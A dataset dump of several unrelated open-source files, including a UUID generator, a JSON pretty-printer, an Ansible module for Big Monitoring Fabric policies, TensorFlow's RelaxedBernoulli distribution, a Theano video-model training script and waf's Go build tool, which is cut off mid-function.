| repo_name (string, 5–100 chars) | ref (string, 12–67 chars) | path (string, 4–244 chars) | copies (string, 1–8 chars) | content (string, 0–1.05M chars, nullable ⌀) |
|---|---|---|---|---|
hujiajie/pa-chromium
|
refs/heads/master
|
remoting/tools/uuidgen.py
|
40
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
uuidgen.py -- UUID generation utility.
"""
import sys
import uuid
def main():
print uuid.uuid4()
return 0
if __name__ == '__main__':
sys.exit(main())
|
jchevin/MissionPlanner-master
|
refs/heads/master
|
Lib/json/tool.py
|
113
|
r"""Command-line tool to validate and pretty-print JSON
Usage::
$ echo '{"json":"obj"}' | python -m json.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m json.tool
Expecting property name: line 1 column 2 (char 2)
"""
import sys
import json
def main():
if len(sys.argv) == 1:
infile = sys.stdin
outfile = sys.stdout
elif len(sys.argv) == 2:
infile = open(sys.argv[1], 'rb')
outfile = sys.stdout
elif len(sys.argv) == 3:
infile = open(sys.argv[1], 'rb')
outfile = open(sys.argv[2], 'wb')
else:
raise SystemExit(sys.argv[0] + " [infile [outfile]]")
try:
obj = json.load(infile)
except ValueError, e:
raise SystemExit(e)
json.dump(obj, outfile, sort_keys=True, indent=4)
outfile.write('\n')
if __name__ == '__main__':
main()
|
adamwwt/chvac
|
refs/heads/master
|
venv/lib/python2.7/site-packages/sqlalchemy/dialects/drizzle/__init__.py
|
195
|
from sqlalchemy.dialects.drizzle import base, mysqldb
base.dialect = mysqldb.dialect
from sqlalchemy.dialects.drizzle.base import \
BIGINT, BINARY, BLOB, \
BOOLEAN, CHAR, DATE, \
DATETIME, DECIMAL, DOUBLE, \
ENUM, FLOAT, INTEGER, \
NUMERIC, REAL, TEXT, \
TIME, TIMESTAMP, VARBINARY, \
VARCHAR, dialect
__all__ = (
'BIGINT', 'BINARY', 'BLOB',
'BOOLEAN', 'CHAR', 'DATE',
'DATETIME', 'DECIMAL', 'DOUBLE',
'ENUM', 'FLOAT', 'INTEGER',
'NUMERIC', 'REAL', 'TEXT',
'TIME', 'TIMESTAMP', 'VARBINARY',
'VARCHAR', 'dialect'
)
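# A minimal usage sketch (connection details are illustrative): the
# `base.dialect = mysqldb.dialect` assignment above registers the MySQLdb
# DBAPI as the default, so a plain "drizzle://" URL resolves to it:
#
#   from sqlalchemy import create_engine
#   engine = create_engine("drizzle://user:passwd@localhost/test")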
|
dgarros/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/bigswitch/bigmon_policy.py
|
51
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Ansible module to manage Big Monitoring Fabric service chains
# (c) 2016, Ted Elhourani <ted@bigswitch.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: bigmon_policy
author: "Ted (@tedelhourani)"
short_description: Create and remove a bigmon out-of-band policy.
description:
- Create and remove a bigmon out-of-band policy.
version_added: "2.3"
options:
name:
description:
- The name of the policy.
required: true
policy_description:
description:
- Description of policy.
action:
description:
- Forward matching packets to delivery interfaces, drop matching packets (measuring their rate
without forwarding them to delivery interfaces), capture matching packets and write them to a PCAP file, or enable NetFlow generation.
default: forward
choices: ['forward', 'drop', 'capture', 'flow-gen']
priority:
description:
- A priority associated with this policy. A higher-priority policy takes precedence over a lower-priority one.
default: 100
duration:
description:
- Run the policy for the given duration, or until delivery_packet_count packets are delivered, whichever comes first.
default: 0
start_time:
description:
- Date and time at which the policy becomes active.
default: ansible_date_time.iso8601
delivery_packet_count:
description:
- Run policy until delivery_packet_count packets are delivered.
default: 0
state:
description:
- Whether the policy should be present or absent.
default: present
choices: ['present', 'absent']
controller:
description:
- The controller address.
required: true
validate_certs:
description:
- If C(false), SSL certificates will not be validated. This should only be used
on personally controlled devices using self-signed certificates.
required: false
default: true
choices: [true, false]
access_token:
description:
- Bigmon access token. If this isn't set, the environment variable C(BIGSWITCH_ACCESS_TOKEN) is used.
'''
EXAMPLES = '''
- name: policy to aggregate filter and deliver data center (DC) 1 traffic
bigmon_policy:
name: policy1
policy_description: DC 1 traffic policy
action: drop
controller: '{{ inventory_hostname }}'
state: present
validate_certs: false
'''
RETURN = ''' # '''
import os
import datetime
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.bigswitch_utils import Rest, Response
from ansible.module_utils.pycompat24 import get_exception
def policy(module):
try:
access_token = module.params['access_token'] or os.environ['BIGSWITCH_ACCESS_TOKEN']
except KeyError:
e = get_exception()
module.fail_json(msg='Unable to load %s' % e.message)
name = module.params['name']
policy_description = module.params['policy_description']
action = module.params['action']
priority = module.params['priority']
duration = module.params['duration']
start_time = module.params['start_time']
delivery_packet_count = module.params['delivery_packet_count']
state = module.params['state']
controller = module.params['controller']
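# Build a REST client for the Big Tap controller API; authentication is a
# session cookie carrying the access token.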
rest = Rest(module,
{'content-type': 'application/json', 'Cookie': 'session_cookie='+access_token},
'https://'+controller+':8443/api/v1/data/controller/applications/bigtap')
if name is None:
module.fail_json(msg='parameter `name` is missing')
response = rest.get('policy?config=true', data={})
if response.status_code != 200:
module.fail_json(msg="failed to obtain existing policy config: {}".format(response.json['description']))
config_present = False
matching = [policy for policy in response.json
if policy['name'] == name and
policy['duration'] == duration and
policy['delivery-packet-count'] == delivery_packet_count and
policy['policy-description'] == policy_description and
policy['action'] == action and
policy['priority'] == priority]
if matching:
config_present = True
if state == 'present' and config_present:
module.exit_json(changed=False)
if state == 'absent' and not config_present:
module.exit_json(changed=False)
if state == 'present':
data={'name': name, 'action': action, 'policy-description': policy_description,
'priority': priority, 'duration': duration, 'start-time': start_time,
'delivery-packet-count': delivery_packet_count }
response = rest.put('policy[name="%s"]' % name, data=data)
if response.status_code == 204:
module.exit_json(changed=True)
else:
module.fail_json(msg="error creating policy '{}': {}".format(name, response.json['description']))
if state == 'absent':
response = rest.delete('policy[name="%s"]' % name, data={})
if response.status_code == 204:
module.exit_json(changed=True)
else:
module.fail_json(msg="error deleting policy '{}': {}".format(name, response.json['description']))
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True),
policy_description=dict(type='str', default=''),
action=dict(choices=['forward', 'drop', 'capture', 'flow-gen'], default='forward'),
priority=dict(type='int', default=100),
duration=dict(type='int', default=0),
start_time=dict(type='str', default=datetime.datetime.now().isoformat()+'+00:00'),
delivery_packet_count=dict(type='int', default=0),
controller=dict(type='str', required=True),
state=dict(choices=['present', 'absent'], default='present'),
validate_certs=dict(type='bool', default=True),
access_token=dict(type='str', no_log=True)
)
)
try:
policy(module)
except Exception:
e = get_exception()
module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
|
tornadozou/tensorflow
|
refs/heads/master
|
tensorflow/contrib/distributions/python/ops/relaxed_bernoulli.py
|
55
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The RelaxedBernoulli distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.distributions.python.ops import logistic
# Bijectors must be directly imported because `remove_undocumented` prevents
# individual file imports.
from tensorflow.contrib.distributions.python.ops.bijectors.sigmoid import Sigmoid
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops.distributions import transformed_distribution
from tensorflow.python.ops.distributions import util as distribution_util
class RelaxedBernoulli(transformed_distribution.TransformedDistribution):
"""RelaxedBernoulli distribution with temperature and logits parameters.
The RelaxedBernoulli is a distribution over the unit interval (0,1), which
continuously approximates a Bernoulli. The degree of approximation is
controlled by a temperature: as the temperature goes to 0 the RelaxedBernoulli
becomes discrete with a distribution described by the `logits` or `probs`
parameters, and as the temperature goes to infinity the RelaxedBernoulli
becomes the constant distribution that is identically 0.5.
The RelaxedBernoulli distribution is a reparameterized continuous
distribution that is the binary special case of the RelaxedOneHotCategorical
distribution (Maddison et al., 2016; Jang et al., 2016). For details on the
binary special case see the appendix of Maddison et al. (2016) where it is
referred to as BinConcrete. If you use this distribution, please cite both
papers.
Some care needs to be taken for loss functions that depend on the
log-probability of RelaxedBernoullis, because computing log-probabilities of
the RelaxedBernoulli can suffer from underflow issues. In many cases such loss
functions are invariant under invertible transformations of the random
variables. The KL divergence, found in the variational autoencoder loss, is
an example. Because RelaxedBernoullis are sampled by a Logistic random
variable followed by a `tf.sigmoid` op, one solution is to treat the Logistic
as the random variable and `tf.sigmoid` as downstream. The KL divergence of
two Logistics, which are always followed by a `tf.sigmoid` op, is equivalent
to the KL divergence of the corresponding RelaxedBernoulli samples. See
Maddison et al. (2016), where this distribution is called the BinConcrete,
for more details.
An alternative approach is to evaluate Bernoulli log probability or KL
directly on relaxed samples, as done in Jang et al., 2016. In this case,
guarantees on the loss are usually violated. For instance, using a Bernoulli
KL in a relaxed ELBO is no longer a lower bound on the log marginal
probability of the observation. Thus care and early stopping are important.
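A minimal Monte Carlo sketch of the Logistic-space approach described above
(the locations, scales and sample count are illustrative):
```python
q = Logistic(0., 2.)   # approximate posterior, in logit space
p = Logistic(1., 2.)   # prior, in logit space
x = q.sample(1000)
# Estimate KL(q || p); since `tf.sigmoid` is invertible, this equals the
# KL divergence between the corresponding RelaxedBernoulli distributions.
kl_estimate = tf.reduce_mean(q.log_prob(x) - p.log_prob(x))
```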
#### Examples
Creates three continuous distributions, which approximate 3 Bernoullis with
probabilities (0.1, 0.5, 0.4). Samples from these distributions will be in
the unit interval (0,1).
```python
temperature = 0.5
p = [0.1, 0.5, 0.4]
dist = RelaxedBernoulli(temperature, probs=p)
```
Creates three continuous distributions, which approximate 3 Bernoullis with
logits (-2, 2, 0). Samples from these distributions will be in
the unit interval (0,1).
```python
temperature = 0.5
logits = [-2, 2, 0]
dist = RelaxedBernoulli(temperature, logits=logits)
```
Creates three continuous distributions whose sigmoid-transformed samples
approximate 3 Bernoullis with logits (-2, 2, 0).
```python
temperature = 0.5
logits = [-2, 2, 0]
dist = Logistic(logits/temperature, 1./temperature)
samples = dist.sample()
sigmoid_samples = tf.sigmoid(samples)
# sigmoid_samples has the same distribution as samples from
# RelaxedBernoulli(temperature, logits=logits)
```
Creates three continuous distributions, which approximate 3 Bernoullis with
logits (-2, 2, 0). Samples from these distributions will be in
the unit interval (0,1). Because the temperature is very low, samples from
these distributions are almost discrete, usually taking values very close to 0
or 1.
```python
temperature = 1e-5
logits = [-2, 2, 0]
dist = RelaxedBernoulli(temperature, logits=logits)
```
Creates three continuous distributions, which approximate 3 Bernoullis with
logits (-2, 2, 0). Samples from these distributions will be in
the unit interval (0,1). Because the temperature is very high, samples from
these distributions are usually close to the (0.5, 0.5, 0.5) vector.
```python
temperature = 100
logits = [-2, 2, 0]
dist = RelaxedBernoulli(temperature, logits=logits)
```
Chris J. Maddison, Andriy Mnih, and Yee Whye Teh. The Concrete Distribution:
A Continuous Relaxation of Discrete Random Variables. 2016.
Eric Jang, Shixiang Gu, and Ben Poole. Categorical Reparameterization with
Gumbel-Softmax. 2016.
"""
def __init__(self,
temperature,
logits=None,
probs=None,
validate_args=False,
allow_nan_stats=True,
name="RelaxedBernoulli"):
"""Construct RelaxedBernoulli distributions.
Args:
temperature: A 0-D `Tensor`, representing the temperature
of a set of RelaxedBernoulli distributions. The temperature should be
positive.
logits: An N-D `Tensor` representing the log-odds
of a positive event. Each entry in the `Tensor` parametrizes
an independent RelaxedBernoulli distribution where the probability of an
event is sigmoid(logits). Only one of `logits` or `probs` should be
passed in.
probs: An N-D `Tensor` representing the probability of a positive event.
Each entry in the `Tensor` parameterizes an independent Bernoulli
distribution. Only one of `logits` or `probs` should be passed in.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
Raises:
ValueError: If both `probs` and `logits` are passed, or if neither.
"""
parameters = locals()
with ops.name_scope(name, values=[logits, probs, temperature]):
with ops.control_dependencies([check_ops.assert_positive(temperature)]
if validate_args else []):
self._temperature = array_ops.identity(temperature, name="temperature")
self._logits, self._probs = distribution_util.get_logits_and_probs(
logits=logits, probs=probs, validate_args=validate_args)
super(RelaxedBernoulli, self).__init__(
distribution=logistic.Logistic(
self._logits / self._temperature,
1. / self._temperature,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=name + "/Logistic"),
bijector=Sigmoid(validate_args=validate_args),
validate_args=validate_args,
name=name)
self._parameters = parameters
@staticmethod
def _param_shapes(sample_shape):
return {"logits": ops.convert_to_tensor(sample_shape, dtype=dtypes.int32)}
@property
def temperature(self):
"""Distribution parameter for the location."""
return self._temperature
@property
def logits(self):
"""Log-odds of `1`."""
return self._logits
@property
def probs(self):
"""Probability of `1`."""
return self._probs
|
Kazade/NeHe-Website
|
refs/heads/master
|
google_appengine/lib/django_1_2/django/contrib/gis/models.py
|
624
|
from django.db import connection
if (hasattr(connection.ops, 'spatial_version') and
not connection.ops.mysql):
# Getting the `SpatialRefSys` and `GeometryColumns`
# models for the default spatial backend. These
# aliases are provided for backwards-compatibility.
SpatialRefSys = connection.ops.spatial_ref_sys()
GeometryColumns = connection.ops.geometry_columns()
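# A minimal usage sketch (the SRID is illustrative): with a spatial backend,
# these aliases expose the backend's spatial metadata tables, e.g.
#
#   from django.contrib.gis.models import SpatialRefSys
#   srs = SpatialRefSys.objects.get(srid=4326)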
|
capybaralet/Sequential-Generation
|
refs/heads/master
|
TestRAMVideo.py
|
1
|
##################################################################
# Code for testing the variational Multi-Stage Generative Model. #
##################################################################
from __future__ import print_function, division
# basic python
import cPickle as pickle
from PIL import Image
import numpy as np
import numpy.random as npr
from collections import OrderedDict
import time
# theano business
import theano
import theano.tensor as T
# blocks stuff
from blocks.initialization import Constant, IsotropicGaussian, Orthogonal
from blocks.filter import VariableFilter
from blocks.graph import ComputationGraph
from blocks.roles import PARAMETER
from blocks.model import Model
from blocks.bricks import Tanh, Identity, Rectifier
from blocks.bricks.cost import BinaryCrossEntropy
from blocks.bricks.recurrent import SimpleRecurrent, LSTM
# phil's sweetness
import utils
from BlocksModels import *
from RAMBlocks import *
from DKCode import get_adam_updates, get_adadelta_updates
from load_data import load_udm, load_tfd, load_svhn_gray, load_binarized_mnist
from HelperFuncs import construct_masked_data, shift_and_scale_into_01, \
row_shuffle, to_fX, one_hot_np
from MotionRenderers import TrajectoryGenerator, ObjectPainter
RESULT_PATH = "RAM_TEST_RESULTS/"
def test_seq_cond_gen_sequence(step_type='add'):
##############################
# File tag, for output stuff #
##############################
result_tag = "{}VID_SCG".format(RESULT_PATH)
batch_size = 100
traj_len = 10
im_dim = 32
obs_dim = im_dim*im_dim
# configure a trajectory generator
x_range = [-0.8,0.8]
y_range = [-0.8,0.8]
max_speed = 0.15
TRAJ = TrajectoryGenerator(x_range=x_range, y_range=y_range, \
max_speed=max_speed)
# configure an object renderer
OPTR = ObjectPainter(im_dim, im_dim, obj_type='circle', obj_scale=0.2)
# get a Theano function for doing the rendering
_center_x = T.vector()
_center_y = T.vector()
_delta = T.vector()
_sigma = T.vector()
_W = OPTR.write(_center_y, _center_x, _delta, _sigma)
write_func = theano.function(inputs=[_center_y, _center_x, _delta, _sigma], \
outputs=_W)
def generate_batch(num_samples):
# generate a minibatch of trajectories
traj_pos, traj_vel = TRAJ.generate_trajectories(num_samples, traj_len)
traj_x = traj_pos[:,:,0]
traj_y = traj_pos[:,:,1]
# draw the trajectories
center_x = to_fX( traj_x.T.ravel() )
center_y = to_fX( traj_y.T.ravel() )
delta = to_fX( np.ones(center_x.shape) )
sigma = to_fX( np.ones(center_x.shape) )
W = write_func(center_y, center_x, delta, 0.05*sigma)
# shape trajectories into a batch for passing to the model
batch_imgs = np.zeros((num_samples, traj_len, obs_dim))
for i in range(num_samples):
start_idx = i * traj_len
end_idx = start_idx + traj_len
img_set = W[start_idx:end_idx,:]
batch_imgs[i,:,:] = img_set
batch_imgs = np.swapaxes(batch_imgs, 0, 1)
batch_imgs = to_fX( batch_imgs )
return batch_imgs
############################################################
# Setup some parameters for the Iterative Refinement Model #
############################################################
total_steps = traj_len
init_steps = 3
exit_rate = 0.0
nll_weight = 0.1
x_dim = obs_dim
y_dim = obs_dim
z_dim = 100
rnn_dim = 400
write_dim = 400
mlp_dim = 400
def visualize_attention(result, pre_tag="AAA", post_tag="AAA"):
seq_len = result[0].shape[0]
samp_count = result[0].shape[1]
# get generated predictions
x_samps = np.zeros((seq_len*samp_count, obs_dim))
idx = 0
for s1 in range(samp_count):
for s2 in range(seq_len):
x_samps[idx] = result[0][s2,s1,:]
idx += 1
file_name = "{0:s}_traj_xs_{1:s}.png".format(pre_tag, post_tag)
utils.visualize_samples(x_samps, file_name, num_rows=samp_count)
# get sequential attention maps
seq_samps = np.zeros((seq_len*samp_count, obs_dim))
idx = 0
for s1 in range(samp_count):
for s2 in range(seq_len):
seq_samps[idx] = result[1][s2,s1,:obs_dim] + result[1][s2,s1,obs_dim:]
idx += 1
file_name = "{0:s}_traj_att_maps_{1:s}.png".format(pre_tag, post_tag)
utils.visualize_samples(seq_samps, file_name, num_rows=samp_count)
# get sequential attention maps (read out values)
seq_samps = np.zeros((seq_len*samp_count, obs_dim))
idx = 0
for s1 in range(samp_count):
for s2 in range(seq_len):
seq_samps[idx] = result[2][s2,s1,:obs_dim] + result[2][s2,s1,obs_dim:]
idx += 1
file_name = "{0:s}_traj_read_outs_{1:s}.png".format(pre_tag, post_tag)
utils.visualize_samples(seq_samps, file_name, num_rows=samp_count)
return
rnninits = {
'weights_init': IsotropicGaussian(0.01),
'biases_init': Constant(0.),
}
inits = {
'weights_init': IsotropicGaussian(0.01),
'biases_init': Constant(0.),
}
read_N = 2 # inner/outer grid dimension for reader
reader_mlp = SimpleAttentionReader2d(x_dim=obs_dim, con_dim=rnn_dim,
width=im_dim, height=im_dim, N=read_N,
img_scale=1.0, att_scale=0.5,
**inits)
read_dim = reader_mlp.read_dim # total number of "pixels" read by reader
writer_mlp = MLP([None, None], [rnn_dim, write_dim, obs_dim], \
name="writer_mlp", **inits)
# mlps for processing inputs to LSTMs
con_mlp_in = MLP([Identity()], [ z_dim, 4*rnn_dim], \
name="con_mlp_in", **inits)
var_mlp_in = MLP([Identity()], [(y_dim + read_dim + rnn_dim), 4*rnn_dim], \
name="var_mlp_in", **inits)
gen_mlp_in = MLP([Identity()], [ (read_dim + rnn_dim), 4*rnn_dim], \
name="gen_mlp_in", **inits)
# mlps for turning LSTM outputs into conditionals over z_gen
con_mlp_out = CondNet([Rectifier(), Rectifier()], \
[rnn_dim, mlp_dim, mlp_dim, z_dim], \
name="con_mlp_out", **inits)
gen_mlp_out = CondNet([], [rnn_dim, z_dim], name="gen_mlp_out", **inits)
var_mlp_out = CondNet([], [rnn_dim, z_dim], name="var_mlp_out", **inits)
# LSTMs for the actual LSTMs (obviously, perhaps)
con_rnn = BiasedLSTM(dim=rnn_dim, ig_bias=2.0, fg_bias=2.0, \
name="con_rnn", **rnninits)
gen_rnn = BiasedLSTM(dim=rnn_dim, ig_bias=2.0, fg_bias=2.0, \
name="gen_rnn", **rnninits)
var_rnn = BiasedLSTM(dim=rnn_dim, ig_bias=2.0, fg_bias=2.0, \
name="var_rnn", **rnninits)
SeqCondGen_doc_str = \
"""
SeqCondGen -- constructs conditional densities under time constraints.
This model sequentially constructs a conditional density estimate by taking
repeated glimpses at the input x, and constructing a hypothesis about the
output y. The objective is maximum likelihood for (x,y) pairs drawn from
some training set. We learn a proper generative model, using variational
inference -- which can be interpreted as a sort of guided policy search.
The input pairs (x, y) can be either "static" or "sequential". In the
static case, the same x and y are used at every step of the hypothesis
construction loop. In the sequential case, x and y can change at each step
of the loop.
Parameters:
x_and_y_are_seqs: boolean telling whether the conditioning information
and prediction targets are sequential.
total_steps: total number of steps in sequential estimation process
init_steps: number of steps prior to first NLL measurement
exit_rate: probability of exiting following each non "init" step
**^^ THIS IS SET TO 0 WHEN USING SEQUENTIAL INPUT ^^**
nll_weight: weight for the prediction NLL term at each step.
**^^ THIS IS IGNORED WHEN USING STATIC INPUT ^^**
step_type: whether to use "additive" steps or "jump" steps
-- jump steps predict directly from the controller LSTM's
"hidden" state (a.k.a. its memory cells).
x_dim: dimension of inputs on which to condition
y_dim: dimension of outputs to predict
reader_mlp: used for reading from the input
writer_mlp: used for writing to the output prediction
con_mlp_in: preprocesses input to the "controller" LSTM
con_rnn: the "controller" LSTM
con_mlp_out: CondNet for distribution over z given con_rnn
gen_mlp_in: preprocesses input to the "generator" LSTM
gen_rnn: the "generator" LSTM
gen_mlp_out: CondNet for distribution over z given gen_rnn
var_mlp_in: preprocesses input to the "variational" LSTM
var_rnn: the "variational" LSTM
var_mlp_out: CondNet for distribution over z given gen_rnn
"""
SCG = SeqCondGen(
x_and_y_are_seqs=True,
total_steps=total_steps,
init_steps=init_steps,
exit_rate=exit_rate,
nll_weight=nll_weight,
step_type=step_type,
x_dim=obs_dim,
y_dim=obs_dim,
reader_mlp=reader_mlp,
writer_mlp=writer_mlp,
con_mlp_in=con_mlp_in,
con_mlp_out=con_mlp_out,
con_rnn=con_rnn,
gen_mlp_in=gen_mlp_in,
gen_mlp_out=gen_mlp_out,
gen_rnn=gen_rnn,
var_mlp_in=var_mlp_in,
var_mlp_out=var_mlp_out,
var_rnn=var_rnn)
SCG.initialize()
compile_start_time = time.time()
# build the attention trajectory sampler
SCG.build_attention_funcs()
# quick test of attention trajectory sampler
samp_count = 32
Xb = generate_batch(samp_count)
result = SCG.sample_attention(Xb, Xb)
result[0] = Xb
visualize_attention(result, pre_tag=result_tag, post_tag="b0")
# build the main model functions (i.e. training and cost functions)
SCG.build_model_funcs()
compile_end_time = time.time()
compile_minutes = (compile_end_time - compile_start_time) / 60.0
print("THEANO COMPILE TIME (MIN): {}".format(compile_minutes))
#SCG.load_model_params(f_name="SCG_params.pkl")
################################################################
# Apply some updates, to check that they aren't totally broken #
################################################################
print("Beginning to train the model...")
out_file = open("{}_results.txt".format(result_tag), 'wb')
out_file.flush()
costs = [0. for i in range(10)]
learn_rate = 0.0001
momentum = 0.9
for i in range(250000):
scale = min(1.0, ((i+1) / 2000.0))
if (((i + 1) % 10000) == 0):
learn_rate = learn_rate * 0.95
if (i > 5000):
momentum = 0.95
else:
momentum = 0.9
# set sgd and objective function hyperparams for this update
SCG.set_sgd_params(lr=learn_rate, mom_1=momentum, mom_2=0.99)
SCG.set_lam_kld(lam_kld_q2p=0.95, lam_kld_p2q=0.05, lam_kld_p2g=0.0)
# perform a minibatch update and record the cost for this batch
Xb = generate_batch(batch_size)
result = SCG.train_joint(Xb, Xb)
costs = [(costs[j] + result[j]) for j in range(len(result))]
# output diagnostic information and checkpoint parameters, etc.
if ((i % 100) == 0):
costs = [(v / 100.0) for v in costs]
str1 = "-- batch {0:d} --".format(i)
str2 = " total_cost: {0:.4f}".format(costs[0])
str3 = " nll_bound : {0:.4f}".format(costs[1])
str4 = " nll_term : {0:.4f}".format(costs[2])
str5 = " kld_q2p : {0:.4f}".format(costs[3])
str6 = " kld_p2q : {0:.4f}".format(costs[4])
str7 = " kld_p2g : {0:.4f}".format(costs[5])
str8 = " reg_term : {0:.4f}".format(costs[6])
joint_str = "\n".join([str1, str2, str3, str4, str5, str6, str7, str8])
print(joint_str)
out_file.write(joint_str+"\n")
out_file.flush()
costs = [0.0 for v in costs]
if ((i % 200) == 0):
SCG.save_model_params("{}_params.pkl".format(result_tag))
# compute a small-sample estimate of NLL bound on validation set
samp_count = 128
Xb = generate_batch(samp_count)
va_costs = SCG.compute_nll_bound(Xb, Xb)
str1 = " va_nll_bound : {}".format(va_costs[1])
str2 = " va_nll_term : {}".format(va_costs[2])
str3 = " va_kld_q2p : {}".format(va_costs[3])
joint_str = "\n".join([str1, str2, str3])
print(joint_str)
out_file.write(joint_str+"\n")
out_file.flush()
###########################################
# Sample and draw attention trajectories. #
###########################################
samp_count = 32
Xb = generate_batch(samp_count)
result = SCG.sample_attention(Xb, Xb)
post_tag = "b{0:d}".format(i)
visualize_attention(result, pre_tag=result_tag, post_tag=post_tag)
if __name__=="__main__":
test_seq_cond_gen_sequence(step_type='add')
|
mattaw/SoCFoundationFlow
|
refs/heads/master
|
admin/waf/waf-1.8.19/waflib/extras/go.py
|
4
|
#!/usr/bin/env python
# encoding: utf-8
# Tom Wambold tom5760 gmail.com 2009
# Thomas Nagy 2010
"""
Go as a language may look nice, but its toolchain is one of the worst a developer
has ever seen. It keeps changing though, and I would like to believe that it will get
better eventually, but the crude reality is that this tool and the examples are
getting broken every few months.
If you have been lured into trying to use Go, you should stick to their Makefiles.
"""
import os, platform
from waflib import Utils, Task, TaskGen
from waflib.TaskGen import feature, extension, after_method, before_method
from waflib.Tools.ccroot import link_task, stlink_task, propagate_uselib_vars, process_use
class go(Task.Task):
run_str = '${GOC} ${GOCFLAGS} ${CPPPATH_ST:INCPATHS} -o ${TGT} ${SRC}'
class gopackage(stlink_task):
run_str = '${GOP} grc ${TGT} ${SRC}'
class goprogram(link_task):
run_str = '${GOL} ${GOLFLAGS} -o ${TGT} ${SRC}'
inst_to = '${BINDIR}'
chmod = Utils.O755
class cgopackage(stlink_task):
color = 'YELLOW'
inst_to = '${LIBDIR}'
ext_in = ['.go']
ext_out = ['.a']
def run(self):
src_dir = self.generator.bld.path
source = self.inputs
target = self.outputs[0].change_ext('')
#print ("--> %s" % self.outputs)
#print ('++> %s' % self.outputs[1])
bld_dir = self.outputs[1]
bld_dir.mkdir()
obj_dir = bld_dir.make_node('_obj')
obj_dir.mkdir()
bld_srcs = []
for s in source:
# FIXME: it seems gomake/cgo stumbles on filenames like a/b/c.go
# -> for the time being replace '/' with '_'...
#b = bld_dir.make_node(s.path_from(src_dir))
b = bld_dir.make_node(s.path_from(src_dir).replace(os.sep,'_'))
b.parent.mkdir()
#print ('++> %s' % (s.path_from(src_dir),))
try:
try:os.remove(b.abspath())
except Exception:pass
os.symlink(s.abspath(), b.abspath())
except Exception:
# if no support for symlinks, copy the file from src
b.write(s.read())
bld_srcs.append(b)
#print("--|> [%s]" % b.abspath())
b.sig = Utils.h_file(b.abspath())
pass
#self.set_inputs(bld_srcs)
#self.generator.bld.raw_deps[self.uid()] = [self.signature()] + bld_srcs
makefile_node = bld_dir.make_node("Makefile")
makefile_tmpl = '''\
# Copyright 2009 The Go Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file. ---
include $(GOROOT)/src/Make.inc
TARG=%(target)s
GCIMPORTS= %(gcimports)s
CGOFILES=\\
\t%(source)s
CGO_CFLAGS= %(cgo_cflags)s
CGO_LDFLAGS= %(cgo_ldflags)s
include $(GOROOT)/src/Make.pkg
%%: install %%.go
$(GC) $*.go
$(LD) -o $@ $*.$O
''' % {
'gcimports': ' '.join(l for l in self.env['GOCFLAGS']),
'cgo_cflags' : ' '.join(l for l in self.env['GOCFLAGS']),
'cgo_ldflags': ' '.join(l for l in self.env['GOLFLAGS']),
'target': target.path_from(obj_dir),
'source': ' '.join([b.path_from(bld_dir) for b in bld_srcs])
}
makefile_node.write(makefile_tmpl)
#print ("::makefile: %s"%makefile_node.abspath())
cmd = Utils.subst_vars('gomake ${GOMAKE_FLAGS}', self.env).strip()
o = self.outputs[0].change_ext('.gomake.log')
fout_node = bld_dir.find_or_declare(o.name)
fout = open(fout_node.abspath(), 'w')
rc = self.generator.bld.exec_command(
cmd,
stdout=fout,
stderr=fout,
cwd=bld_dir.abspath(),
)
if rc != 0:
import waflib.Logs as msg
msg.error('** error running [%s] (cgo-%s)' % (cmd, target))
msg.error(fout_node.read())
return rc
self.generator.bld.read_stlib(
target,
paths=[obj_dir.abspath(),],
)
tgt = self.outputs[0]
if tgt.parent != obj_dir:
install_dir = os.path.join('${LIBDIR}',
tgt.parent.path_from(obj_dir))
else:
install_dir = '${LIBDIR}'
#print('===> %s (%s)' % (tgt.abspath(), install_dir))
self.generator.bld.install_files(
install_dir,
tgt.abspath(),
relative_trick=False,
postpone=False,
)
return rc
@extension('.go')
def compile_go(self, node):
#print('*'*80, self.name)
if not ('cgopackage' in self.features):
return self.create_compiled_task('go', node)
#print ('compile_go-cgo...')
#bld_dir = node.parent.get_bld()
#obj_dir = bld_dir.make_node('_obj')
return self.create_task('cgopackage', node, node.change_ext('.a'))
@feature('gopackage', 'goprogram', 'cgopackage')
@before_method('process_source')
def go_compiler_is_foobar(self):
if self.env.GONAME == 'gcc':
return
self.source = self.to_nodes(self.source)
src = []
go = []
for node in self.source:
if node.name.endswith('.go'):
go.append(node)
else:
src.append(node)
self.source = src
